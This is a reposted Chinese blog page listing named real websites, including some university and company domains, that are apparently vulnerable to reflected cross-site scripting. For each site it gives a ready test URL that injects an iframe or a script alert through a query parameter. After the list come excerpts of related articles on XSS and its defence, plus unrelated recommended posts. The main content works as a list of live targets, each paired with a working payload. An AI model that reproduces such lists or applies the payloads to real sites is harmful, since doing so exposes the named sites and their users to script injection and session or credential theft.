from :http://blog.sina.com.cn/s/blog_68d342d90100nh7b.html

什么是XSS跨站攻击:
http://baike.baidu.com/view/50325.htm
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://sqxhsp.com/news.asp?cat_id=11&types=企业新闻
XSS跨站漏洞测试页面:
http://sqxhsp.com/sever.asp?cat_id=58&types=<iframe src=http://blog.sina.com.cn/aboutshisan width=600 height=400></iframe>
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://www.zyfw365.com/newscontent.aspx?myclass=就业形式&title=就业形势好转 2010年新增就业目标900万人&infoid=435
XSS跨站漏洞测试页面:
http://www.zyfw365.com/newscontent.aspx?myclass=<iframe src=http://blog.sina.com.cn/aboutshisan width=600 heightt=400></iframe>&title=就业形势好转 2010年新增就业目标900万人&infoid=435
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://manage.hncc.edu.cn/more.asp?typeid=16&bigclass=
XSS跨站漏洞测试页面:
http://manage.hncc.edu.cn/more.asp?typeid=16&bigclass=<iframe src=http://blog.sina.com.cn/aboutshisan width=600 heightt=400></iframe>
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://jwc.xjmu.edu.cn/_help/Sorry.aspx?str=
XSS跨站漏洞测试页面:
http://jwc.xjmu.edu.cn/_help/Sorry.aspx?str=<script>alert('silic_tank')</script>
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://alpas.com/qiye/Product.asp?BigClassName=产品销售
XSS跨站漏洞测试页面:
http://alpas.com/qiye/Product.asp?BigClassName=产品销售<script>alert('silic_tank')</script>
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://www.yangheyuyang.com/error.asp?msg=
XSS跨站漏洞测试页面:
http://www.yangheyuyang.com/error.asp?msg=<script>alert('silic')</script>
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://www.3v.cm/error.asp?errmsg=
XSS跨站漏洞测试页面:
http://www.3v.cm/error.asp?errmsg=<script>alert('yf4n')</script>
-----------------------------------------------------------------------
存在XSS跨站漏洞的网址:
http://www.blueidea.com/common/searchbykey.asp?keyword=painter
XSS跨站漏洞测试页面:
http://www.blueidea.com/common/searchbykey.asp?keyword=painter<script>alert('silic')</script>

find xss的更多相关文章

  1. 防御XSS攻击-encode用户输入内容的重要性

    一.开场先科普下XSS 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS.恶 ...

  2. XSS

    XSS的含义 XSS(Cross Site Scripting)即跨站脚本.跨站的主要内容是在脚本上. 跨站脚本 跨站脚本的跨,体现了浏览器的特性,可以跨域.所以也就给远程代码或者第三方域上的代码提供 ...

  3. 【XSS】延长 XSS 生命期

    XSS 的本质仍是一段脚本.和其他文档元素一样,页面关了一切都销毁.除非能将脚本蔓延到页面以外的地方,那样才能获得更长的生命力. 庆幸的是,从 DOM 诞生的那一天起,就已为我们准备了这个特殊的功能, ...

  4. 探索ASP.NET MVC5系列之~~~2.视图篇(上)---包含XSS防御和异步分部视图的处理

    其实任何资料里面的任何知识点都无所谓,都是不重要的,重要的是学习方法,自行摸索的过程(不妥之处欢迎指正) 汇总:http://www.cnblogs.com/dunitian/p/4822808.ht ...

  5. XSS分析及预防

    XSS(Cross Site Scripting),又称跨站脚本,XSS的重点不在于跨站点,而是在于脚本的执行.在WEB前端应用日益发展的今天,XSS漏洞尤其容易被开发人员忽视,最终可能造成对个人信息 ...

  6. 个人网站对xss跨站脚本攻击(重点是富文本编辑器情况)和sql注入攻击的防范

    昨天本博客受到了xss跨站脚本注入攻击,3分钟攻陷--其实攻击者进攻的手法很简单,没啥技术含量.只能感叹自己之前竟然完全没防范. 这是数据库里留下的一些记录.最后那人弄了一个无限循环弹出框的脚本,估计 ...

  7. xss和sql注入原理学习

    8.4 Web跨站脚本攻击 8.4.1  跨站脚本攻击的原理(1) 跨站脚本在英文中称为Cross-Site Scripting,缩写为CSS.但是,由于层叠样式表 (Cascading Style ...

  8. XSS 前端防火墙 —— 整装待发

    到目前为止,我们把能用前端脚本防御 XSS 的方案都列举了一遍. 尽管看起来似乎很复杂累赘,不过那些是理论探讨而已,在实际中未必要都实现.我们的目标只是为了预警,能发现问题就行,并非要做到滴水不漏的程 ...

  9. XSS 前端防火墙 —— 天衣无缝的防护

    上一篇讲解了钩子程序的攻防实战,并实现了一套对框架页的监控方案,将防护作用到所有子页面. 到目前为止,我们防护的深度已经差不多,但广度还有所欠缺. 例如,我们的属性钩子只考虑了 setAttribut ...

  10. XSS 前端防火墙 —— 无懈可击的钩子

    昨天尝试了一系列的可疑模块拦截试验,尽管最终的方案还存在着一些兼容性问题,但大体思路已经明确了: 静态模块:使用 MutationObserver 扫描. 动态模块:通过 API 钩子来拦截路径属性. ...

随机推荐

  1. gimp的使用笔记

    gimp是德国的开源软件! 跟其他软件一样, 包括file, edit, view, 还有select, color , filter, 和 window. 窗口window就包括所有的dockabl ...

  2. A^B mod C (快速幂+快速乘+取模)题解

    A^B mod C Given A,B,C, You should quickly calculate the result of A^B mod C. (1<=A,B,C<2^63). ...

  3. Java 多线程案例

    同步代码块 SynchronizedTest类,用来表示取票功能 package concurency.chapter6; public class SynchronizedTest implemen ...

  4. 论文阅读之:Deep Meta Learning for Real-Time Visual Tracking based on Target-Specific Feature Space

    Deep Meta Learning for Real-Time Visual Tracking based on Target-Specific Feature Space  2018-01-04  ...

  5. 51nod P1305 Pairwise Sum and Divide ——思路题

    久しぶり! 发现的一道有意思的题,想了半天都没有找到规律,结果竟然是思路题..(在大佬题解的帮助下) 原题戳>>https://www.51nod.com/onlineJudge/ques ...

  6. Caused by: org.apache.ibatis.reflection.ReflectionException: There is no getter for property named 'zoneId' in 'class java.lang.String'

    本文为博主原创,未经允许不得而转载: 异常展示: dao层定义的接口为: public int getClientTotal(); 在mybatis中的sql为: <select id=&quo ...

  7. shell案例题

    目录: 1.批量生成随机字符文件名案例 2.批量改名特殊案例 3.批量创建特殊要求用户案例 1.批量生成随机字符文件名案例(P359) (1).利用openssl命令来实现 #!/bin/bash # ...

  8. Leetcode88_Merge Sorted Array_Easy

    Given two sorted integer arrays nums1 and nums2, merge nums2 into nums1 as one sorted array. Note: T ...

  9. JqGrid 自定义子表格 及 自定义Json 格式数据不展示

    项目第一次使用JqGrid ,发现功能强大,但由于对他不熟悉,也没有少走弯路,记录一下. 1.引用 <link href="~/Scripts/JqGrid/jqgrid/css/ui ...

  10. JAVA中char和String/值类型和引用类型的区别

    import java.util.*; class test { public static void main(String[] args) { char a[] = {'b', 'a', 'c'} ...